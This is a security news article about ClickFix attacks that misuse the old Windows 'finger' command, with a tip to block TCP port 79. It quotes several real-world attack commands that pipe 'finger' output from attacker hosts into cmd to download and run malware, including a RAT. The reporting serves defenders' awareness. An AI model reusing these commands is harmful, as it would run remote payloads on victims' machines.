The classic 'Finger' command, once a harmless tool, has been weaponized in a new wave of malware attacks.
A blast from the past, with a malicious twist:
The 'Finger' protocol, a relic from the early days of computing, is experiencing a resurgence, but not in a positive light. Threat actors are exploiting this decades-old command to launch ClickFix attacks on Windows devices, marking a concerning evolution in cybercrime. In the digital realm, even the most innocent-looking tools can be twisted for nefarious purposes.
A brief history of 'Finger':
Back in the day, the 'finger' command was a simple way to gather information about users on Unix and Linux systems, later adopted by Windows. It provided basic user details, such as login name, home directory, and last seen activity. However, its popularity has faded over the years, leaving it a rarely used relic.
But here's where it gets controversial—this isn't the first time 'Finger' has been misused. In 2020, researchers discovered that it was being abused as a LOLBIN to stealthily download malware, highlighting the command's potential as a backdoor for malicious activities.
The recent attacks:
Last month, a cybersecurity researcher, MalwareHunterTeam, revealed a batch file that, when executed, used the 'finger root@finger.nateams[.]com' command to fetch and run remote commands. This campaign has evolved, with attackers now impersonating Captcha prompts, tricking users into running Windows commands. A Reddit user fell victim, sharing their experience of entering 'cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' Verify you are human--press ENTER' into their command prompt.
This attack leverages the Finger protocol to deliver remote scripts. By piping the output through cmd.exe, the attackers execute commands that download and extract malicious files, including a Python package. The purpose of this package remains unclear, but it's suspected to be an infostealer.
A more sophisticated variant:
Another campaign, discovered by MalwareHunterTeam, uses a similar tactic with the command 'finger Kove2@api.metrics-strange.com | cmd'. This attack is more evolved, searching for common malware analysis tools and exiting if found. If the coast is clear, it downloads and extracts a zip archive, containing the NetSupport Manager RAT package, and sets up a scheduled task to launch the malware when the user logs in.
Protecting against 'Finger' abuse:
As these ClickFix attacks continue to ensnare victims, awareness is crucial. Defenders can block these attacks by restricting outgoing traffic to TCP port 79, which is used to connect to the Finger protocol daemon.
Looking ahead to 2026:
In other news, the 2026 CISO Budget Benchmark report reveals insights from over 300 CISOs and security leaders, offering a glimpse into their strategies and priorities for the upcoming year. As we approach 2026, it's essential to stay informed about the evolving cybersecurity landscape and the measures organizations are taking to combat threats.
